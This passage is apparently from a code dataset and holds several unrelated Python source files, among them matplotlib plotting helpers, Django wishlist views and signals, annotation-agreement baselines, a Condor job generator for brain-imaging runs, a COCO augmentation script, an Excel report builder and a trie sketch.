y\n \"\"\"\n plt.figure(self.figure)\n self.figure += 1\n xt = [X[i][0] for i in range(len(X))]\n yt = [X[i][1] for i in range(len(X))]\n xe = [Y[i][0] for i in range(len(Y))]\n ye = [Y[i][1] for i in range(len(Y))]\n trainX = plt.scatter(xt, yt, s = 100, c = 'r', alpha = 0.5)\n evalY = plt.scatter(xe, ye, s = 100, c = 'g', alpha = 0.5)\n plt.legend((trainX, evalY),('Training Data', 'Eval Data'))\n plt.show()\n\n def barGraph(self, x, y):\n \"\"\"\n a horizontal bar graph just like in command line plotter\n takes in two lists x and y\n \"\"\"\n plt.figure(self.figure)\n self.figure += 1\n plt.barh(y, x)\n plt.show()\n\n def barGraphfortop(self, x, y, book = 'None Given'):\n '''\n a bar graph to show the words and its frequency\n '''\n y_pos = np.arange(len(x))\n plt.barh(y_pos, y, height = 0.5-(4/(len(y_pos)+2)),align='center', alpha=0.2)\n plt.yticks(y_pos, x)\n plt.xlabel('Frequency')\n plt.title(book.upper()+ \" - most frequent used words\")\n plt.show()\n","sub_path":"MatPlotPloter.py","file_name":"MatPlotPloter.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"160020582","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSignals relating to likes.\n\"\"\"\nfrom django.dispatch import Signal\n\n# Sent just before a like will be posted (after it's been approved and\n# moderated; this can be used to modify the like (in place) with posting\n# details or other such actions. If any receiver returns False the like will be\n# discarded and a 403 (not allowed) response. This signal is sent at more or less\n# the same time (just before, actually) as the like object's pre-save signal,\n# except that the HTTP request is sent along with this signal.\nlike_will_be_posted = Signal(providing_args=[\"like\", \"request\"])\n\n# Sent just after a like was posted. See above for how this differs\n# from the like object's post-save signal.\nlike_was_posted = Signal(providing_args=[\"like\", \"request\"])\n\n# Sent after a like was \"flagged\" in some way. Check the flag to see if this\n# was a user requesting removal of a like, a moderator approving/removing a\n# like, or some other custom user flag.\nlike_was_flagged = Signal(providing_args=[\"like\", \"flag\", \"created\", \"request\"])\n","sub_path":"likes/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"634540427","text":"import numpy as np\nimport pandas as pd\nfrom scipy.stats import pearsonr\nfrom sklearn.metrics import accuracy_score\nfrom scipy.stats import entropy as kl\nfrom sklearn.metrics import roc_auc_score, f1_score\n\n\n\ndef get_baseline_matrix(labels, k, agg_function, eval_function):\n\n \"\"\" \n Say we have 2k human scores for each comment. For each comment, for\n all (i,j) <= (k+1), spit human scores into 2 non-overlapping sets of I and J\n of size i and j respectively. Compute correlation between the mean of scores\n in set I and set J for all comments. Intuitively, correlation i,j tells\n us how good i humans are are predicting the labels of another group of j\n humans.\n\n As i increases, we expect to get better predictions and as j increases, we\n expect to get more predictable labels.\n\n To figure out how many humans we need to label each question, we should\n examine the diagonal of the matrix (where i=j) and pick a value of i=j where\n there are diminishing returns to going further down the diagonal.\n\n To figure out how hard we should try at building a machine learning model\n for labels that we got from aggregating j_0 human labels we can check the\n correlations for different values of i. We can interpret correlation (i,\n j_0) as how good an \"ensemble\" of i humans is at predicting the labels.\n\n So a model that can achieve correlation (1, j_0) is as good as a single\n human. Also, we would expect that a model should not beat correlation (j_0,\n j_0). If it does, then it overfit to the group and you should increase j0.\n\n \"\"\"\n n = k-1\n m = int(np.ceil(k/2))\n\n labels = labels.dropna()\n groups = labels.groupby(labels.index)\n groups = [e[1] for e in groups if e[1].shape[0]>=k]\n \n print('Num comments with k labels', len(groups))\n \n r = pd.DataFrame(np.zeros((m, n)))\n r.index = r.index +1\n r.columns = r.columns +1\n\n for i in range(1, m+1):\n for j in range(i, n+1):\n if (i+j) > k:\n continue\n\n dis = []\n djs = []\n for g in groups:\n if g.shape[0] >= i+j:\n g = g.iloc[np.random.permutation(len(g))]\n dis.append(g[0:i])\n djs.append(g[i:(i+j)])\n else:\n print(i,j, g, \"WARNING: Comment had less than k labels\")\n\n di = pd.concat(dis)\n dj = pd.concat(djs)\n\n scores_i = agg_function (di)\n scores_j = agg_function (dj)\n\n r.ix[i,j] = \"%0.3f\" % eval_function(scores_i,scores_j)\n return r\n\n\n# Aggregation Functions\n\ndef average(l):\n \"\"\"\n Average all labels with the same rev_id\n \"\"\"\n s = l.groupby(l.index).mean()\n s.name = 'y'\n return s\n\ndef plurality(l):\n \"\"\"\n Take the most common label from all labels with the same rev_id\n \"\"\"\n s = l.groupby(l.index).apply(lambda x:x.value_counts().index[0])\n s.name = 'y'\n return s\n\ndef empirical_dist(l, w = 0.5, index = None):\n\n \"\"\"\n Compute empirical distribution over all classes\n using all labels with the same rev_id\n \"\"\"\n if not index:\n index = sorted(list(set(l.dropna().values)))\n data = {}\n for k, g in l.groupby(l.index):\n data[k] = g.value_counts().reindex(index).fillna(0) + w\n\n labels = pd.DataFrame(data).T\n labels = labels.fillna(0)\n labels = labels.div(labels.sum(axis=1), axis=0)\n return labels\n\n\n# Evaluation Metrics\n\ndef pearson(x,y):\n return pearsonr(x,y)[0]\n\ndef roc_auc(pred, true):\n true = (true > 0.5).astype(float)\n return roc_auc_score(true, pred)\n\ndef optimal_f1(pred, true, step = 1):\n binary_true = (true > 0.5).astype(float)\n ts = [np.percentile(pred, p) for p in np.arange(0, 101, step)]\n f1s = []\n for t in ts:\n y_pred_t = pred >= t\n f1 = f1_score(binary_true, y_pred_t)\n # Note F1 should have a parabolic shape, so no need to continue when the score starts falling\n if len(f1s) > 0 and f1 < f1s[-1] :\n return f1s[-1]\n else:\n f1s.append(f1)\n\n return f1s[-1]\n\n\n\ndef cross_entropy(x, y):\n logy = np.log(y)\n logy[np.isinf(logy)] = 0\n return - np.multiply(x,logy).sum(axis=1).mean() \n\ndef kl_divergence(x, y):\n return kl(x.T, y.T).mean()\n\ndef tidy_labels(d):\n classes = ['not_attack', 'other', 'quoting', 'recipient', 'third_party']\n for e in classes:\n d[e] = d.is_harassment_or_attack.str.contains(e).astype(float)\n d['attack'] = d.is_harassment_or_attack.str.contains('|'.join(classes[1:])).astype(float)\n return d\n\ndef load_cf_data():\n blocked = [\n 'annotated_onion_layer_5_rows_0_to_10000', #annotated 7 times\n 'annotated_onion_layer_5_rows_0_to_10000_raters_3', #annotated 3 times\n 'annotated_onion_layer_5_rows_0_to_5000_raters_20', #annotated 20 times\n 'annotated_onion_layer_5_rows_10000_to_50526_raters_10',#annotated 10 times\n 'annotated_onion_layer_10_rows_0_to_1000', #annotated 7 times\n 'annotated_onion_layer_20_rows_0_to_1000', #annotated 7 times\n 'annotated_onion_layer_30_rows_0_to_1000', #annotated 7 times\n ]\n\n random = [\n 'annotated_random_data_rows_5000_to_10000',\n 'annotated_random_data_rows_0_to_5000_raters_20',\n ]\n\n blocked_dfs = []\n for f in blocked:\n d = pd.read_csv('data/v4_annotated/%s.csv' % f)\n d = d.query('_golden == False')\n d.index = d.rev_id\n d['src'] = f\n blocked_dfs.append(d)\n\n random_dfs = []\n for f in random:\n d = pd.read_csv('data/v4_annotated/%s.csv' % f)\n d = d.query('_golden == False')\n d.index = d.rev_id\n d['src'] = f\n random_dfs.append(d)\n\n\n return tidy_labels(pd.concat(blocked_dfs)), tidy_labels(pd.concat(random_dfs))\n\n\n","sub_path":"baselines.py","file_name":"baselines.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"319676204","text":"#!/usr/bin/env python\n\"\"\"\nCreate condor file to run antsCorticalThickness.sh on nifti files.\n\nRun:\n$ python condor_ants.py ~/data-share/ADNI/files.txt --dir ~/data-share/ADNI --key ADNI1_3yr_1.5T --id ADNI1_3yr_1.5T\n\nOutput:\n condor_submit_antsCorticalThickness[_id].txt\n\nAuthors:\n - Arno Klein, 2014 (arno@mindboggle.info) http://binarybottle.com\n\nCopyright 2014, Mindboggle team (http://mindboggle.info), Apache v2.0 License\n\n\"\"\"\nimport os\nimport argparse\n\n#-----------------------------------------------------------------------------\n# Command-line arguments:\n#-----------------------------------------------------------------------------\nparser = argparse.ArgumentParser(description=\"\"\"\n Create condor file to run antsCorticalThickness.sh \n on nifti (MR image) files.\"\"\",\n formatter_class = lambda prog:\n argparse.HelpFormatter(prog, max_help_position=40))\n# \"positional arguments\":\nparser.add_argument(\"FILES\",\n help=('file containing image file names, one per line'))\n# \"optional arguments\":\nparser.add_argument(\"--dir\",\n help=(\"path to files in FILES\"),\n default='', metavar='STR')\nparser.add_argument(\"--key\",\n help=(\"string to look for when including files in FILES (default empty)\"),\n default='', metavar='STR')\nparser.add_argument(\"--id\",\n help=(\"string to append to saved files (default empty)\"),\n default='', metavar='STR')\nargs = parser.parse_args()\nFILES = args.FILES\ndir = args.dir\nkey = args.key\nid = args.id\n\n#-----------------------------------------------------------------------------\n# Read FILES, with one image file name per line:\n#-----------------------------------------------------------------------------\nFr = open(FILES, 'r')\nlines = Fr.readlines()\nFr.close()\n\n#-----------------------------------------------------------------------------\n# Write to output file for condor_submit:\n#-----------------------------------------------------------------------------\nif id:\n condor_file = \"condor_submit_antsCorticalThickness_\" + id + \".txt\"\n logs = 'logs_ants_' + id\nelse:\n condor_file = \"condor_submit_antsCorticalThickness.txt\"\n logs = 'logs_ants'\nif not os.path.exists(logs):\n os.mkdir(logs)\nFp = open(condor_file, 'wa')\nFp.write('Universe = vanilla\\n'\n 'Executable = /home/arno/software/antsbin/bin/antsCorticalThickness.sh\\n'\n 'Log = {0}/ants.log\\n'\n 'Output = {0}/ants.$(Process).out\\n'\n 'Error = {0}/ants.$(Process).error\\n'\n 'Environment = ANTSPATH=/home/arno/software/antsbin/bin/\\n'\n 'getenv = True\\n\\n'.format(logs))\n\n#-----------------------------------------------------------------------------\n# Write arguments for each file in FILES (that contains key string if given);\n# we name the subject as the string preceding '.nii':\n#-----------------------------------------------------------------------------\nout = '/home/arno/data-share/ADNI'\ntpath = '/home/arno/data-share/brains/Atropos_templates/OASIS-30_Atropos_template'\nenda = 'T_template0.nii.gz'\nendb = 'T_template0_BrainCerebellum.nii.gz'\nendc = 'T_template0_BrainCerebellumProbabilityMask.nii.gz'\nendd = 'T_template0_BrainCerebellumExtractionMask.nii.gz'\nende = 'Priors2/priors%d.nii.gz'\n\nfor line in lines:\n if dir:\n FILE = os.path.join(dir, line)\n else:\n FILE = line\n FILE = FILE.split('\\n')[0]\n\n if key and key not in FILE:\n pass\n else:\n\n name = os.path.split(FILE)[1].split('.nii')[0]\n\n prefix = '{0}/antsCorticalThickness/{1}/ants'.format(out, name)\n args = '-d 3 -n 3 -w 0.25 -a {0} -o {1} -e {2}/{3} -t {2}/{4} -m {2}/{5} -f {2}/{6} -p {2}/{7}'\\\n .format(FILE, prefix, tpath, enda, endb, endc, endd, ende)\n Fp.write('Arguments = \"{0}\"\\n'.format(args))\n Fp.write('Queue\\n\\n')\n\nFp.close()\n","sub_path":"condor/condor_ants.py","file_name":"condor_ants.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"116354390","text":"from django.shortcuts import (\n render, redirect, reverse, HttpResponse,\n get_list_or_404, get_object_or_404\n)\nfrom .models import Game, UserProfile, Wishlist, WishlistItem\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\n\n\n@login_required\ndef wishlist(request):\n \"\"\"Shows all games in the user's wishlist\"\"\"\n user = get_object_or_404(UserProfile, user=request.user)\n\n wishlist = Wishlist.objects.get_or_create(user=user)\n wishlist_user = wishlist[0]\n\n wishlist_exists = WishlistItem.objects.filter(\n wishlist=wishlist_user\n ).exists()\n\n games = []\n if wishlist_exists:\n user_wishlist = get_list_or_404(WishlistItem, wishlist=wishlist_user)\n for obj in user_wishlist:\n game = get_object_or_404(Game, name=obj)\n games.append(game)\n context = {\n 'wishlist': True,\n 'games': games\n }\n return render(request, 'wishlist/wishlist.html', context)\n\n else:\n context = {\n 'wishlist': False,\n }\n return render(request, 'wishlist/wishlist.html', context)\n\n\n@login_required\ndef add_to_wishlist(request, game_id):\n \"\"\"Adds game to the wishlist\"\"\"\n redirect_url = request.POST.get('redirect_url')\n\n user = get_object_or_404(UserProfile, user=request.user)\n\n wishlist = Wishlist.objects.get_or_create(user=user)\n wishlist_user = wishlist[0]\n\n game = Game.objects.get(pk=game_id)\n\n if request.POST:\n game_in_wishlist = WishlistItem.objects.filter(\n wishlist=wishlist_user,\n game=game\n ).exists()\n if game_in_wishlist:\n messages.error(request, \"Game already in your wishlist\")\n return redirect(redirect_url)\n\n else:\n added_item = WishlistItem(wishlist=wishlist_user, game=game)\n added_item.save()\n messages.success(request, \"Game added to your wishlist\")\n return redirect(redirect_url)\n else:\n messages.error(request, \"Click 'Add to wishlist' to add a item \")\n return render(request, 'home/index.html')\n\n\n@login_required\ndef delete_from_wishlist(request, game_id):\n \"\"\"Removes game from the wishlist\"\"\"\n redirect_url = request.POST.get('redirect_url')\n\n user = get_object_or_404(UserProfile, user=request.user)\n wishlist = Wishlist.objects.get_or_create(user=user)\n wishlist_user = wishlist[0]\n\n if request.POST:\n game = Game.objects.get(pk=game_id)\n\n game_in_wishlist = WishlistItem.objects.filter(game=game).exists()\n\n if game_in_wishlist:\n game = WishlistItem.objects.get(game=game)\n game.delete()\n messages.success(request, \"Game removed from wishlist\")\n return redirect(redirect_url)\n\n if game_in_wishlist is None:\n messages.error(\n request,\n \"Can't delete item as it is not in your wishlist\"\n )\n return redirect(redirect_url)\n else:\n messages.error(request, 'Item can only be deleted from your wishlist')\n return render(request, 'home/index.html')\n","sub_path":"wishlist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"219368307","text":"import cv2\r\nimport pickle\r\nimport os\r\nimport random\r\nimport json\r\nimport numpy as np\r\nimport copy\r\n\r\njson_data = open('./train_no_poly.json').read()\r\ndata = json.loads(json_data)\r\nimages = data['images']\r\nannotations = data['annotations']\r\nfile_path = './data/coco/train2017_/'\r\nnew_file_path = './restricted_final/'\r\nrestricted_images = os.listdir(file_path)\r\noutput = []\r\n\r\nfor index in range(len(images)):\r\n task = {\r\n 'filename':images[index]['file_name'],\r\n 'id':images[index]['id'],\r\n 'width':images[index]['width'],\r\n 'height': images[index]['height'],\r\n 'ann':{}\r\n }\r\n output.append(task)\r\n\r\niter = 0\r\npb = 0.5\r\nfor index in range(len(output)):\r\n bboxarr = np.array([])\r\n labelarr = np.array([])\r\n while iter < len(annotations) and annotations[iter]['image_id'] == output[index]['id']:\r\n bboxtmp = np.array([[(annotations[iter]['bbox'][0]), (annotations[iter]['bbox'][1]),(annotations[iter]['bbox'][0])+ (annotations[iter]['bbox'][2]),\r\n (annotations[iter]['bbox'][1]) + (annotations[iter]['bbox'][3])]], dtype='int')\r\n labeltmp = np.array([annotations[iter]['category_id']], dtype='int')\r\n if len(bboxarr) == 0:\r\n bboxarr = bboxtmp\r\n labelarr = labeltmp\r\n else:\r\n bboxarr = np.append(bboxarr, bboxtmp, axis = 0)\r\n labelarr = np.append(labelarr, labeltmp, axis=0)\r\n\r\n output[index]['ann']['bboxes'] = bboxarr\r\n output[index]['ann']['labels'] = labelarr\r\n iter = iter + 1\r\n if len(output[index]['ann']) != 0:\r\n img = cv2.imread(file_path + output[index]['filename'])\r\n if img is not None:\r\n cv2.imwrite(new_file_path + output[index]['filename'], img)\r\n # flip horizontally\r\n if random.random() > pb:\r\n result = cv2.flip(img, 1)\r\n cv2.imwrite(new_file_path + str(index) + '_h_flip.jpg', result)\r\n tmp = copy.deepcopy(output[index])\r\n tmp['filename'] = str(index) + '_h_flip.jpg'\r\n for i in range(tmp['ann']['bboxes'].shape[0]):\r\n arr = copy.deepcopy(tmp['ann']['bboxes'][i])\r\n arr[0] = tmp['width'] - tmp['ann']['bboxes'][i][2]\r\n arr[2] = tmp['width'] - tmp['ann']['bboxes'][i][0]\r\n tmp['ann']['bboxes'][i] = arr\r\n # cv2.rectangle(result, (arr[0], arr[1]), (arr[2], arr[3]), (0, 0, 255), 4)\r\n # cv2.imwrite('001_new.jpg', result)\r\n output.append(tmp)\r\n # flip vertically\r\n if random.random() > pb:\r\n result = cv2.flip(img, 0)\r\n cv2.imwrite(new_file_path + str(index) + '_v_flip.jpg', result)\r\n tmp = copy.deepcopy(output[index])\r\n tmp['filename'] = str(index) + '_v_flip.jpg'\r\n for i in range(tmp['ann']['bboxes'].shape[0]):\r\n arr = copy.deepcopy(tmp['ann']['bboxes'][i])\r\n arr[1] = tmp['height'] - tmp['ann']['bboxes'][i][3]\r\n arr[3] = tmp['height'] - tmp['ann']['bboxes'][i][1]\r\n tmp['ann']['bboxes'][i] = arr\r\n result = cv2.rectangle(result, (arr[0], arr[1]), (arr[2], arr[3]), (0, 0, 255), 4)\r\n output.append(tmp)\r\n # flip vertically and horizontally\r\n if random.random() > 0.9:\r\n result = cv2.flip(img, -1)\r\n cv2.imwrite(new_file_path + str(index) + '_hv_flip.jpg', result)\r\n tmp = copy.deepcopy(output[index])\r\n tmp['filename'] = str(index) + '_hv_flip.jpg'\r\n for i in range(tmp['ann']['bboxes'].shape[0]):\r\n arr = copy.deepcopy(tmp['ann']['bboxes'][i])\r\n arr[0] = tmp['width'] - tmp['ann']['bboxes'][i][2]\r\n arr[2] = tmp['width'] - tmp['ann']['bboxes'][i][0]\r\n arr[1] = tmp['height'] - tmp['ann']['bboxes'][i][3]\r\n arr[3] = tmp['height'] - tmp['ann']['bboxes'][i][1]\r\n tmp['ann']['bboxes'][i] = arr\r\n result = cv2.rectangle(result, (arr[0], arr[1]), (arr[2], arr[3]), (0, 0, 255), 4)\r\n output.append(tmp)\r\n # rotate 90\r\n if random.random() > pb:\r\n result = np.rot90(img)\r\n cv2.imwrite(new_file_path + str(index) + '_rotate_90.jpg', result)\r\n tmp = copy.deepcopy(output[index])\r\n tmp['filename'] = str(index) + '_rotate_90.jpg'\r\n for i in range(tmp['ann']['bboxes'].shape[0]):\r\n arr = copy.deepcopy(tmp['ann']['bboxes'][i])\r\n arr[0] = tmp['ann']['bboxes'][i][1]\r\n arr[1] = tmp['width'] - tmp['ann']['bboxes'][i][2]\r\n arr[2] = tmp['ann']['bboxes'][i][3]\r\n arr[3] = tmp['width'] - tmp['ann']['bboxes'][i][0]\r\n tmp['ann']['bboxes'][i] = arr\r\n result = cv2.rectangle(result, (arr[0], arr[1]), (arr[2], arr[3]), (0, 0, 255), 4)\r\n #cv2.imwrite('004_new.jpg', result)\r\n val = copy.deepcopy(tmp['width'])\r\n tmp['width'] = copy.deepcopy(tmp['height'])\r\n tmp['height'] = copy.deepcopy(val)\r\n\r\n output.append(tmp)\r\n # rotate 270\r\n if random.random() > pb:\r\n result = np.rot90(img, 3)\r\n cv2.imwrite(new_file_path + str(index) + '_rotate_270.jpg', result)\r\n tmp = copy.deepcopy(output[index])\r\n tmp['filename'] = str(index) + '_rotate_270.jpg'\r\n for i in range(tmp['ann']['bboxes'].shape[0]):\r\n arr = copy.deepcopy(tmp['ann']['bboxes'][i])\r\n arr[0] = tmp['height'] - tmp['ann']['bboxes'][i][3]\r\n arr[1] = tmp['ann']['bboxes'][i][0]\r\n arr[2] = tmp['height'] - tmp['ann']['bboxes'][i][1]\r\n arr[3] = tmp['ann']['bboxes'][i][2]\r\n tmp['ann']['bboxes'][i] = arr\r\n result = cv2.rectangle(result, (arr[0], arr[1]), (arr[2], arr[3]), (0, 0, 255), 4)\r\n\r\n val = copy.deepcopy(tmp['width'])\r\n tmp['width'] = copy.deepcopy(tmp['height'])\r\n tmp['height'] = copy.deepcopy(val)\r\n output.append(tmp)\r\n\r\nfor index in range(len(output)):\r\n del output[index]['id']\r\n\r\nfor index in range(len(output)):\r\n if index < len(output) and len(output[index]['ann']) == 0:\r\n print(output[index])\r\n del output[index]\r\n index = index - 1\r\n\r\n\r\nwith open('data/coco/annotations/coco_input_all_augm_final.pkl', 'wb') as outfile:\r\n pickle.dump(output, outfile)\r\n\r\nrandom.shuffle(output)\r\n\r\noutput_80 = []\r\nfor iter in range(int(len(output)*0.8)):\r\n output_80.append(output[iter])\r\n\r\nwith open('data/coco/annotations/coco_input_augm_80_final.pkl', 'wb') as outfile:\r\n pickle.dump(output_80, outfile)\r\n\r\noutput_20 = []\r\nfor iter in range(int(len(output)*0.8),len(output)):\r\n output_20.append(output[iter])\r\nwith open('data/coco/annotations/coco_input_augm_20_final.pkl', 'wb') as outfile:\r\n pickle.dump(output_20, outfile)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"code/mmdetection/data_aumentation.py","file_name":"data_aumentation.py","file_ext":"py","file_size_in_byte":7312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"424153613","text":"class Solution:\n \"\"\"\n @param nums: a binary array\n @return: the maximum length of a contiguous subarray\n \"\"\"\n\n def findMaxLength(self, nums):\n # Write your code here\n dic, max_len, count = {0: -1}, 0, 0\n for i in range(len(nums)):\n count += 1 if nums[i] == 1 else -1\n if count in dic:\n max_len = max(max_len, i - dic[count])\n else:\n dic[count] = i\n return max_len\n","sub_path":"lintcode/994-contiguous-array.py","file_name":"994-contiguous-array.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"162283135","text":"__author__ = 'asia'\n\n\nimport xlsxwriter\nimport datetime\nimport io\nimport re\nimport html\n\nglNumberOfWraps = 8\nglColWidth = []\n\n\nclass ExcelReport (object):\n\n def __init__(self, workbook_name, worksheet_name):\n self.output = io.BytesIO()\n self.workbook = xlsxwriter.Workbook(self.output, {'in_memory': True})\n self.worksheet = []\n self.worksheet = self.workbook.add_worksheet(worksheet_name)\n\n self.write_to_row = 0\n self.write_to_col = 0\n # self.worksheet.set_column(0, 0, 40)\n # self.worksheet.set_column(6, 6, 80)\n\n self._configure_lane_format()\n self._configure_lane_currency_format()\n self._configure_lane_percent_format()\n self._configure_wrap_format()\n self._configure_risk_format()\n self._configure_header_format()\n self._configure_currency_format()\n self._configure_percent_format()\n self.sponsors_dict = {}\n self.params_dict = {}\n self.teams_dict = {}\n\n def __enter__(self):\n return self\n\n\n def close(self):\n self._configure_cols_width()\n self.workbook.close()\n self.output.seek(0)\n return self.output.getvalue()\n\n\n def _configure_cols_width (self):\n global glNumberOfWraps\n global glColWidth\n for i in range(glNumberOfWraps):\n self.worksheet.set_column(i, i, min(glColWidth[i], 100))\n\n\n def _configure_lane_format (self):\n self._format_lane = self.workbook.add_format()\n self._format_lane.set_bg_color('#c0c0c0')\n\n\n def _configure_lane_currency_format (self):\n self._format_lane_currency= self.workbook.add_format()\n self._format_lane_currency.set_bg_color('#c0c0c0')\n self._format_lane_currency.set_num_format(0x03)\n\n\n def _configure_lane_percent_format (self):\n self._format_lane_percent = self.workbook.add_format()\n self._format_lane_percent.set_bg_color('#c0c0c0')\n self._format_lane_percent.set_num_format(0x0a)\n\n\n def _configure_wrap_format (self):\n self._format_wrap = self.workbook.add_format()\n self._format_wrap.set_text_wrap()\n\n\n def _configure_risk_format (self):\n self._format_risk_high_num = self.workbook.add_format()\n self._format_risk_high_num.set_bg_color('#ff6666')\n self._format_risk_high_num.set_num_format(0x03)\n self._format_risk_high = self.workbook.add_format()\n self._format_risk_high.set_bg_color('#ff6666')\n\n self._format_risk_medium_num = self.workbook.add_format()\n self._format_risk_medium_num.set_bg_color('#ffff00')\n self._format_risk_medium_num.set_num_format(0x03)\n self._format_risk_medium = self.workbook.add_format()\n self._format_risk_medium.set_bg_color('#ffff00')\n\n\n def _configure_header_format (self):\n self._format_header = self.workbook.add_format()\n self._format_header.set_bg_color('black')\n self._format_header.set_font_color('white')\n self._format_header.set_font_size (12)\n\n def _configure_currency_format(self):\n self._format_currency = self.workbook.add_format()\n self._format_currency.set_num_format(0x03)\n\n def _configure_percent_format(self):\n self._format_percent = self.workbook.add_format()\n self._format_percent.set_num_format(0x0a)\n\n\n def _reset_cnt (self, lastCell=False):\n if lastCell == True:\n self.write_to_row += 1\n self.write_to_col = 0\n else:\n self.write_to_col += 1\n\n\n def _write_header (self):\n global glNumberOfWraps\n global glColWidth\n\n headers = [\"Team name\", \"No of developers\", \"Sponsor name\", \"Business initiative\", \"Description\", \"Status\", \"Estimated cost\"]\n glNumberOfWraps = len(headers)\n\n glColWidth = [len(headers[x]) for x in range(glNumberOfWraps)]\n\n for i, elem in enumerate(headers):\n self._write_cell(i, elem, self._format_header)\n self._write_cell(0, \"\", None, True)\n\n\n def _write_cell(self, position, text, cell_format=None, lastCell=False):\n global glColWidth\n glColWidth[position] = max(glColWidth[position], len(str(text)))\n if isinstance(text, int):\n self.worksheet.write_number(self.write_to_row, self.write_to_col, int(text), cell_format)\n elif isinstance(text, float):\n self.worksheet.write_number(self.write_to_row, self.write_to_col, float(text), cell_format)\n else:\n self.worksheet.write_string(self.write_to_row, self.write_to_col, text, cell_format)\n self._reset_cnt (lastCell)\n\n\n def _write_merged_cell(self, text, mergeCount, cell_format=None, lastCell=False):\n self.worksheet.merge_range(self.write_to_row, self.write_to_col, self.write_to_row,\n self.write_to_col + mergeCount - 1, text, cell_format)\n self._reset_cnt (lastCell)\n\n def initReport (self, sponsors_dict, params_dict, teams_dict):\n self.sponsors_dict = sponsors_dict\n self.params_dict = params_dict\n self.teams_dict = teams_dict\n self._write_header()\n\n\n def writeSingleLane (self, lane):\n global glNumberOfWraps\n next_lane = lane.getNextLanes()\n if next_lane is not None:\n self._write_merged_cell (lane.parent_lane.title, glNumberOfWraps, self._format_lane, True)\n\n def laneBreak (self):\n self._write_cell(0, \"\", None, True)\n\n\n def writeTeam (self, team_name):\n global glNumberOfWraps\n team = self.teams_dict[team_name]\n teamSize = \"\"\n if team is not None:\n teamSize = str(team.no_of_developers)\n self._write_merged_cell (team_name + \" - \" + teamSize + \" developers\", glNumberOfWraps, self._format_lane, True)\n\n\n def writeSponsor (self, sponsor_name):\n global glNumberOfWraps\n self._write_merged_cell(self.sponsors_dict.get(sponsor_name, \"\"), glNumberOfWraps, self._format_lane, True)\n\n\n def getInCurrency(self, value):\n baseRate = int(self.params_dict[\"report_base_rate\"])\n\n if value is not None:\n return value * baseRate\n return None\n\n\n def writeCard (self, card):\n\n team = self.teams_dict[card.team_name]\n teamSize = \"\"\n if team is not None:\n teamSize = str(team.no_of_developers)\n\n self._write_cell(0, team.name)\n self._write_cell(1, teamSize)\n self._write_cell(2, self.sponsors_dict.get(card.extended_data.sponsor_name, \"\"))\n self._write_cell(3, card.title)\n\n strDescription = re.sub(\"<.*?>\", \" \", card.description)\n strDescription = html.unescape(strDescription)\n self._write_cell(4, strDescription.strip())\n\n self._write_cell(5, card.workflow_status_name)\n self._write_cell(6, self.getInCurrency(card.size), self._format_currency)\n\n self._write_cell(0, \"\", None, True)\n\n\n def writeSummary (self, total, label):\n self._write_cell(0, label, self._format_lane)\n self._write_cell(1, \"\", self._format_lane)\n self._write_cell(2, \"\", self._format_lane)\n self._write_cell(3, \"\", self._format_lane)\n self._write_cell(4, \"\", self._format_lane)\n self._write_cell(5, \"\", self._format_lane)\n self._write_cell(6, self.getInCurrency(total), self._format_lane_currency)\n self._write_cell(0, \"\", None, True)\n\n\n def getMaxSize (self, card_size, taskboard_size):\n if card_size is not None and taskboard_size is not None:\n return max(card_size, taskboard_size)\n if card_size is not None:\n return card_size\n return taskboard_size\n","sub_path":"new_pmo/public/python/lib/excel_team_2.py","file_name":"excel_team_2.py","file_ext":"py","file_size_in_byte":7685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"259753786","text":"import numpy as np\nimport pandas as pd\n\n#Processing the data\n\ndef get_data():\n \n data = pd.read_csv('ecommerce_data.csv')\n data = data.as_matrix()\n\n X = data[:,:-1]\n Y = data[:,-1]\n X[:,1] = (X[:,1] - X[:,1].mean())/X[:,1].std()\n X[:,2] = (X[:,2] - X[:,2].mean())/X[:,2].std()\n\n #One hot-encoding the time_of_day variable\n N, D = X.shape\n #The new Data\n # D+3 because we have for categories {0,1,2,3}\n X2 = np.zeros((N,D+3))\n X2[:, 0:(D-1)] = X[:, 0:(D-1)]\n\n for i in range(N):\n idx = int(X2[i,D-1])\n X2[i, idx+D-1] = 1\n\n return X2, Y\n\n\ndef get_binary_data():\n X, Y = get_data()\n X2 = X[Y <=1]\n Y2 = X[Y <=1]\n return X2, Y2","sub_path":"DL/E_CommerceProject/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"201908029","text":"#용량 부족\nimport sys\n\nclass node:\n def __init__(self,key):\n self.key = key\n self.child = {}\n self.delete = False\n self.protect = False\n self.leaf = False\n\n\nclass trie:\n def __init__(self):\n self.root = node(None)\n\n def insert(self,string,delete):\n cur_node = self.root\n if delete:\n cur_node.delete = True\n else: \n cur_node.protect = True\n for char in string:\n if char not in cur_node.child:\n cur_node.child[char] = node(char)\n cur_node=cur_node.child[char]\n if delete:\n cur_node.delete = True\n else: \n cur_node.protect = True\n if delete:\n cur_node.leaf = True\n\n\n def count_delete(self):\n global ans\n ans = 0\n def count(cur_node):\n global ans\n # print(cur_node.key)\n if cur_node.protect and cur_node.delete and cur_node.leaf:\n # print(\"+\")\n ans +=1\n elif not cur_node.protect and cur_node.delete:\n # print(\"+\")\n ans += 1\n return\n for _,next_node in cur_node.child.items():\n count(next_node)\n \n 